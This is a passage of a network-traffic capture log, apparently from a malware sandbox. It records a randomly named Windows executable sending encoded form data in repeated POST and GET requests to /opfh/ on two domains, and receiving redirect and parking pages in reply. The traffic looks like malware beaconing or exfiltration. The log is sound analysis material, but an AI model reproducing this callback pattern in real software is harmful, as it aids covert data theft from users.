May 27, 2024 12:20:40.980408907 CEST	731	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.ukscan.co.uk Origin: http://www.ukscan.co.uk Referer: http://www.ukscan.co.uk/opfh/ Cache-Control: max-age=0 Content-Length: 238 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 6b 75 62 66 6d 6b 63 75 47 52 65 4e 42 39 54 6b 52 57 78 44 47 39 69 31 33 63 45 7a 41 67 5a 4b 34 73 38 36 6d 47 66 76 4c 47 72 55 75 74 49 4d 6d 55 69 75 75 4d 4f 38 4b 4c 38 63 52 76 76 46 37 54 72 4d 30 53 43 54 2f 52 75 79 66 74 4d 6a 66 76 39 6e 78 47 6d 62 77 6a 73 73 37 67 49 4a 75 44 69 72 44 56 4a 39 32 39 42 75 6b 64 7a 67 72 68 2b 50 4f 4a 32 4c 34 43 62 52 4f 65 78 75 46 61 6b 73 64 44 6c 6e 78 69 6c 4b 78 6f 39 71 6e 6a 5a 6a 2f 4d 45 4a 35 65 70 75 44 74 30 59 59 50 58 45 54 36 4a 72 48 6e 45 54 33 6b 33 32 4a 35 4d 74 31 43 4c 6d 4b 37 71 78 30 73 75 39 37 63 75 62 44 2f 4d 73 33 76 42 73 7a 76 33 78 70 54 61 6f 57 32 54 65 56 37 6b 51 65 33 62 69 36 59 35 59 6e 4a 59 3d Data Ascii: R40L6=kubfmkcuGReNB9TkRWxDG9i13cEzAgZK4s86mGfvLGrUutIMmUiuuMO8KL8cRvvF7TrM0SCT/RuyftMjfv9nxGmbwjss7gIJuDirDVJ929Bukdzgrh+POJ2L4CbROexuFaksdDlnxilKxo9qnjZj/MEJ5epuDt0YYPXET6JrHnET3k32J5Mt1CLmK7qx0su97cubD/Ms3vBszv3xpTaoW2TeV7kQe3bi6Y5YnJY=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	63168	3.33.130.190	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:20:43.518188000 CEST	1744	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.ukscan.co.uk Origin: http://www.ukscan.co.uk Referer: http://www.ukscan.co.uk/opfh/ Cache-Control: max-age=0 Content-Length: 1250 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 6b 75 62 66 6d 6b 63 75 47 52 65 4e 42 39 54 6b 52 57 78 44 47 39 69 31 33 63 45 7a 41 67 5a 4b 34 73 38 36 6d 47 66 76 4c 47 54 55 76 66 77 4d 33 46 69 75 74 4d 4f 38 43 72 38 64 52 76 76 69 37 54 7a 49 30 53 47 74 2f 54 6d 79 46 4b 4d 6a 5a 64 56 6e 6b 32 6d 62 74 7a 73 70 31 41 4a 4c 75 44 53 76 44 56 35 39 32 39 42 75 6b 62 66 67 76 7a 47 50 4d 4a 32 49 77 69 62 56 4b 65 77 78 46 61 38 61 64 44 6f 63 77 52 39 4b 77 49 74 71 68 47 46 6a 7a 4d 45 4c 2b 65 6f 6f 44 73 4a 43 59 50 4b 37 54 37 38 41 48 6b 6b 54 6e 46 47 41 55 39 34 56 73 43 54 65 42 70 79 52 31 66 61 68 30 38 32 62 4a 74 55 4e 33 66 64 55 77 4a 4f 78 74 30 6a 55 58 32 36 76 64 66 49 31 62 6a 4c 6d 68 6f 4e 6e 32 2b 36 4a 34 47 74 43 38 79 77 6b 39 32 69 70 6e 37 6d 41 4d 73 6a 34 50 63 55 67 33 50 33 37 35 35 78 63 66 38 49 58 70 56 30 42 61 53 44 67 63 44 31 6d 70 72 76 31 42 38 4a 56 52 39 2b 72 6e 47 64 39 58 56 41 37 74 65 66 2b 55 73 6a 41 59 65 66 39 34 6c 35 53 4a 58 2f 6d 59 56 53 54 49 6b 6c 30 33 68 2b 48 [TRUNCATED] Data Ascii: R40L6=kubfmkcuGReNB9TkRWxDG9i13cEzAgZK4s86mGfvLGTUvfwM3FiutMO8Cr8dRvvi7TzI0SGt/TmyFKMjZdVnk2mbtzsp1AJLuDSvDV5929BukbfgvzGPMJ2IwibVKewxFa8adDocwR9KwItqhGFjzMEL+eooDsJCYPK7T78AHkkTnFGAU94VsCTeBpyR1fah082bJtUN3fdUwJOxt0jUX26vdfI1bjLmhoNn2+6J4GtC8ywk92ipn7mAMsj4PcUg3P3755xcf8IXpV0BaSDgcD1mprv1B8JVR9+rnGd9XVA7tef+UsjAYef94l5SJX/mYVSTIkl03h+HBVJBCLpGsgTRLEWeQ8t19gpN0zrpA1A3cG/QsvL9DgGaAeoWRxTJwlld0uEHLUlDNRT/F70xHles3LnkyvvuQbTi/OFVLgEPtNaPL6sOleDWuJgen9mFM/2QUTQLIhrhFlAAKFBzqz+hvuCeCKJGRFUoFp7j4GpEA22XQUZG+hsZCIzD5b2x1U3rVdzo3m2QDKP7YKI/ltwJgbb72/5M2zh00ahNFlVwv9egG8ScMxodIHp2FKDBAQr2V1pflBdHmA3s5KAVq87+vtOYWj1sJ+IksmtSwv562z3Ko4GoPDzgdRYACS37Erie8dn3ZmpuYInmlc0/QnAoqmmBSIwKDZFNIOSq9Yq3oPAg1Zcv5NVTZ95Yz7dSZULAlw0GDzRc8iP8u7ByMjLyhciCjld+LbNzMWiX8Ka2gJLh6KLu8op2XQixjZzt+YkpqJz7GIETaNP3DAXMVZpmL/g4bCBzuGN6OHPGCteaRtAkUqqfJYMYbfovsj+MuTf0e5X0LBeR/aEiz/1h68WgwQrPRCBWSxdVAeQSIu+zjO0we31XcCeWcof29EJLvcIKmrRyNzRAvB3rBMZ61Wiq0pXvZvs0PyZik0kFp3vxO+ITv+LOTtF6nnSQ4fxboeRysG05o5HfPIlcV/vPNpwbDDTnGp0FVrpzSImVoho3kB [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	63169	3.33.130.190	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:20:46.049228907 CEST	456	OUT	GET /opfh/?R40L6=psz/lQNJHky0FOXgYDlRBO31u/UTIg5Z7J5/vGqoP1XE+s8tr2C67qXiCqgsbd7PhBjn/lOTwSnvTpIgb8gb5UyiwGIV81pY4xefKgdN39cek8LArgSLQN3X1wfTB8wzGIcdBGhl9zAd&b2PX=hZXl7VFPKl04 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.ukscan.co.uk Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
May 27, 2024 12:20:46.517323017 CEST	419	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 27 May 2024 10:20:46 GMT Content-Type: text/html Content-Length: 279 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 52 34 30 4c 36 3d 70 73 7a 2f 6c 51 4e 4a 48 6b 79 30 46 4f 58 67 59 44 6c 52 42 4f 33 31 75 2f 55 54 49 67 35 5a 37 4a 35 2f 76 47 71 6f 50 31 58 45 2b 73 38 74 72 32 43 36 37 71 58 69 43 71 67 73 62 64 37 50 68 42 6a 6e 2f 6c 4f 54 77 53 6e 76 54 70 49 67 62 38 67 62 35 55 79 69 77 47 49 56 38 31 70 59 34 78 65 66 4b 67 64 4e 33 39 63 65 6b 38 4c 41 72 67 53 4c 51 4e 33 58 31 77 66 54 42 38 77 7a 47 49 63 64 42 47 68 6c 39 7a 41 64 26 62 32 50 58 3d 68 5a 58 6c 37 56 46 50 4b 6c 30 34 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?R40L6=psz/lQNJHky0FOXgYDlRBO31u/UTIg5Z7J5/vGqoP1XE+s8tr2C67qXiCqgsbd7PhBjn/lOTwSnvTpIgb8gb5UyiwGIV81pY4xefKgdN39cek8LArgSLQN3X1wfTB8wzGIcdBGhl9zAd&b2PX=hZXl7VFPKl04"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	63170	199.59.243.225	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:20:51.746674061 CEST	714	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.swordshoop.ca Origin: http://www.swordshoop.ca Referer: http://www.swordshoop.ca/opfh/ Cache-Control: max-age=0 Content-Length: 218 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 55 78 72 79 57 78 51 34 6a 33 43 49 62 32 6f 6b 54 76 78 66 43 76 76 53 72 57 53 76 34 63 76 39 63 71 45 62 71 79 50 56 34 56 4e 6f 4c 58 4f 62 6e 67 38 41 58 6c 52 79 4f 50 71 4f 72 67 58 6d 4a 6c 67 76 38 4b 37 65 6a 58 67 30 73 74 48 78 75 38 48 36 77 6d 44 57 4b 56 64 48 57 2b 72 4d 47 53 74 69 36 4d 53 38 4e 39 32 4f 4b 65 72 33 58 44 57 2f 55 4f 38 46 55 4f 39 37 35 54 48 46 6d 38 69 50 61 71 49 4a 31 33 56 32 51 4c 4e 59 2f 5a 54 42 6c 74 67 78 62 7a 4c 77 43 6a 72 42 51 49 47 4e 36 4e 31 66 49 2b 72 61 75 62 49 41 59 76 46 66 4b 37 61 54 49 6d 57 62 38 44 54 6d 50 42 61 38 2b 7a 66 36 65 30 2f 74 68 38 64 59 6b 41 3d 3d Data Ascii: R40L6=UxryWxQ4j3CIb2okTvxfCvvSrWSv4cv9cqEbqyPV4VNoLXObng8AXlRyOPqOrgXmJlgv8K7ejXg0stHxu8H6wmDWKVdHW+rMGSti6MS8N92OKer3XDW/UO8FUO975THFm8iPaqIJ13V2QLNY/ZTBltgxbzLwCjrBQIGN6N1fI+raubIAYvFfK7aTImWb8DTmPBa8+zf6e0/th8dYkA==
May 27, 2024 12:20:52.199166059 CEST	1236	IN	HTTP/1.1 200 OK date: Mon, 27 May 2024 10:20:51 GMT content-type: text/html; charset=utf-8 content-length: 1118 x-request-id: 06139f7a-18f4-40bc-ab2b-855e8f74a17c cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LelVV+PRdEMQy9bubDNZqxNjiQ72+s3ALo9u5TiNrUVE3KytfWziM2RrUd5R2zkYw2kBJSCNNIbfQuRofbts2g== set-cookie: parking_session=06139f7a-18f4-40bc-ab2b-855e8f74a17c; expires=Mon, 27 May 2024 10:35:52 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4c 65 6c 56 56 2b 50 52 64 45 4d 51 79 39 62 75 62 44 4e 5a 71 78 4e 6a 69 51 37 32 2b 73 33 41 4c 6f 39 75 35 54 69 4e 72 55 56 45 33 4b 79 74 66 57 7a 69 4d 32 52 72 55 64 35 52 32 7a 6b 59 77 32 6b 42 4a 53 43 4e 4e 49 62 66 51 75 52 6f 66 62 74 73 32 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LelVV+PRdEMQy9bubDNZqxNjiQ72+s3ALo9u5TiNrUVE3KytfWziM2RrUd5R2zkYw2kBJSCNNIbfQuRofbts2g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
May 27, 2024 12:20:52.199194908 CEST	571	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDYxMzlmN2EtMThmNC00MGJjLWFiMmItODU1ZThmNzRhMTdjIiwicGFnZV90aW1lIjoxNzE2ODA1Mj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	63171	199.59.243.225	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:20:54.282757998 CEST	734	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.swordshoop.ca Origin: http://www.swordshoop.ca Referer: http://www.swordshoop.ca/opfh/ Cache-Control: max-age=0 Content-Length: 238 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 55 78 72 79 57 78 51 34 6a 33 43 49 61 58 59 6b 55 4d 4a 66 57 2f 76 54 33 6d 53 76 32 38 76 35 63 71 59 62 71 32 33 46 34 41 6c 6f 4f 46 57 62 6f 43 45 41 55 6c 52 79 57 66 71 58 6b 41 58 76 4a 6c 73 64 38 50 44 65 6a 58 6b 30 73 73 33 78 75 4e 48 39 77 32 44 59 53 6c 64 46 62 65 72 4d 47 53 74 69 36 4d 47 53 4e 39 2b 4f 4b 74 44 33 57 68 75 67 64 75 38 47 54 4f 39 37 39 54 48 42 6d 38 69 6d 61 72 56 75 31 31 74 32 51 4c 39 59 2b 4d 2f 43 38 39 67 2f 56 54 4b 4f 54 44 6d 66 55 4c 4b 46 2f 63 31 44 45 70 33 6e 76 74 56 69 43 4e 4a 7a 55 71 69 6f 4d 6b 79 74 72 6c 4f 54 4e 41 65 6b 7a 52 72 62 42 44 61 48 73 75 38 63 79 78 72 4d 71 69 73 53 56 58 42 65 41 43 42 74 61 76 41 53 6d 73 77 3d Data Ascii: R40L6=UxryWxQ4j3CIaXYkUMJfW/vT3mSv28v5cqYbq23F4AloOFWboCEAUlRyWfqXkAXvJlsd8PDejXk0ss3xuNH9w2DYSldFberMGSti6MGSN9+OKtD3Whugdu8GTO979THBm8imarVu11t2QL9Y+M/C89g/VTKOTDmfULKF/c1DEp3nvtViCNJzUqioMkytrlOTNAekzRrbBDaHsu8cyxrMqisSVXBeACBtavASmsw=
May 27, 2024 12:20:54.745572090 CEST	1236	IN	HTTP/1.1 200 OK date: Mon, 27 May 2024 10:20:54 GMT content-type: text/html; charset=utf-8 content-length: 1118 x-request-id: 25be825d-8626-47a9-9a0b-3632227b223a cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LelVV+PRdEMQy9bubDNZqxNjiQ72+s3ALo9u5TiNrUVE3KytfWziM2RrUd5R2zkYw2kBJSCNNIbfQuRofbts2g== set-cookie: parking_session=25be825d-8626-47a9-9a0b-3632227b223a; expires=Mon, 27 May 2024 10:35:54 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4c 65 6c 56 56 2b 50 52 64 45 4d 51 79 39 62 75 62 44 4e 5a 71 78 4e 6a 69 51 37 32 2b 73 33 41 4c 6f 39 75 35 54 69 4e 72 55 56 45 33 4b 79 74 66 57 7a 69 4d 32 52 72 55 64 35 52 32 7a 6b 59 77 32 6b 42 4a 53 43 4e 4e 49 62 66 51 75 52 6f 66 62 74 73 32 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LelVV+PRdEMQy9bubDNZqxNjiQ72+s3ALo9u5TiNrUVE3KytfWziM2RrUd5R2zkYw2kBJSCNNIbfQuRofbts2g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
May 27, 2024 12:20:54.745590925 CEST	571	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjViZTgyNWQtODYyNi00N2E5LTlhMGItMzYzMjIyN2IyMjNhIiwicGFnZV90aW1lIjoxNzE2ODA1Mj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	63172	199.59.243.225	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:20:56.822839975 CEST	1747	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.swordshoop.ca Origin: http://www.swordshoop.ca Referer: http://www.swordshoop.ca/opfh/ Cache-Control: max-age=0 Content-Length: 1250 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 55 78 72 79 57 78 51 34 6a 33 43 49 61 58 59 6b 55 4d 4a 66 57 2f 76 54 33 6d 53 76 32 38 76 35 63 71 59 62 71 32 33 46 34 47 39 6f 53 67 4b 62 6e 46 51 41 56 6c 52 79 49 50 71 53 6b 41 57 76 4a 6c 6c 57 38 50 47 72 6a 56 4d 30 74 4f 76 78 6f 2f 2f 39 2f 32 44 59 4f 56 64 41 57 2b 72 5a 47 53 39 6d 36 4d 57 53 4e 39 2b 4f 4b 6f 48 33 41 44 57 67 62 75 38 46 55 4f 39 33 35 54 48 70 6d 38 36 58 61 72 68 55 79 46 4e 32 4a 76 5a 59 7a 61 4c 43 30 39 68 5a 59 7a 4b 47 54 44 71 2b 55 4e 76 2b 2f 63 52 35 45 75 62 6e 75 70 55 2b 47 4d 56 76 47 37 6d 4b 47 79 69 56 67 47 71 67 41 7a 65 34 38 6a 6e 37 4d 7a 61 37 68 39 6f 69 35 45 58 4b 37 78 64 6e 4d 44 4a 34 57 69 35 69 4f 64 77 4c 33 62 6c 68 6b 50 37 72 66 4a 78 4d 41 5a 4d 59 4a 52 59 52 4a 55 51 47 54 62 44 66 5a 68 2b 50 6f 47 4a 30 5a 6c 6b 62 7a 48 69 50 4c 32 70 73 35 5a 39 63 6a 71 37 68 57 50 76 49 39 6e 78 4c 5a 52 43 52 34 31 44 44 52 59 64 66 36 52 52 51 54 63 77 66 67 70 5a 65 33 5a 6f 52 79 7a 55 6c 2f 41 33 43 54 5a 39 6a [TRUNCATED] Data Ascii: R40L6=UxryWxQ4j3CIaXYkUMJfW/vT3mSv28v5cqYbq23F4G9oSgKbnFQAVlRyIPqSkAWvJllW8PGrjVM0tOvxo//9/2DYOVdAW+rZGS9m6MWSN9+OKoH3ADWgbu8FUO935THpm86XarhUyFN2JvZYzaLC09hZYzKGTDq+UNv+/cR5EubnupU+GMVvG7mKGyiVgGqgAze48jn7Mza7h9oi5EXK7xdnMDJ4Wi5iOdwL3blhkP7rfJxMAZMYJRYRJUQGTbDfZh+PoGJ0ZlkbzHiPL2ps5Z9cjq7hWPvI9nxLZRCR41DDRYdf6RRQTcwfgpZe3ZoRyzUl/A3CTZ9jx/Qb8ERzUT1siH3aGEehOs3YJLzE7NgUUzJCYIe3Amb7m5FW93Swg1KnWA1V3wMTZwCjWdw2l65Ytll9pHO42hbq5k0ibkLCRDbzG3aOnMEa+aTfTEhXOgf/IQbmLRhlXMYzpPS3VHQXnQS2TXd0KFKO5eOSHdm0zLlawkRpF5nbYRZgeWtSn/ra8W0Kjp3Ob4npKLbb+Kk3ODqQTVTiM5GaEVr9AL/zboNYxWMWxHHxo3OgPpbG3kR/M7CyTP20QViqtE5IjrEzPFzc2AVXIY4RtTDxGGgvLXb90Jv1w6f/aRJUixxNVnRTTUJiANYoxlEQuyekgzb/p9zekRrqdDfER2xeHpjpo13oxX/O1gjVMgm9HohUc6OdVYZ3usqWuQn7s+RltlRtLgy4Bltj5GMprJcuedXAqQbfgKbKrSyJY/BTixMHCGhj8ugPfcz9AN/4WLtUqp0dOP0VYPkT38VW+01j9PX4rzafgkNjNS0Hy/efrPsAcGVZcRcBtOmquT8T4m6TKqhy5othBDozmupETDmRNVKw9J5UwCKVqZW3PONFJFSuOyvZMgbLXhU5k87gmvUDC/6T8VhSFt6ThFnm2QHGyMaGXtQS2Q04qG73WalZH/WYvT9K5nSCBCXnkyyXsgn2Vu7zDEZkCOHBG92eHGbK6RZLsU [TRUNCATED]
May 27, 2024 12:20:57.289233923 CEST	1236	IN	HTTP/1.1 200 OK date: Mon, 27 May 2024 10:20:57 GMT content-type: text/html; charset=utf-8 content-length: 1118 x-request-id: f8dd8fa8-c8b6-4e9f-a219-e8272f214711 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LelVV+PRdEMQy9bubDNZqxNjiQ72+s3ALo9u5TiNrUVE3KytfWziM2RrUd5R2zkYw2kBJSCNNIbfQuRofbts2g== set-cookie: parking_session=f8dd8fa8-c8b6-4e9f-a219-e8272f214711; expires=Mon, 27 May 2024 10:35:57 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4c 65 6c 56 56 2b 50 52 64 45 4d 51 79 39 62 75 62 44 4e 5a 71 78 4e 6a 69 51 37 32 2b 73 33 41 4c 6f 39 75 35 54 69 4e 72 55 56 45 33 4b 79 74 66 57 7a 69 4d 32 52 72 55 64 35 52 32 7a 6b 59 77 32 6b 42 4a 53 43 4e 4e 49 62 66 51 75 52 6f 66 62 74 73 32 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LelVV+PRdEMQy9bubDNZqxNjiQ72+s3ALo9u5TiNrUVE3KytfWziM2RrUd5R2zkYw2kBJSCNNIbfQuRofbts2g==" lang="en" style="background: 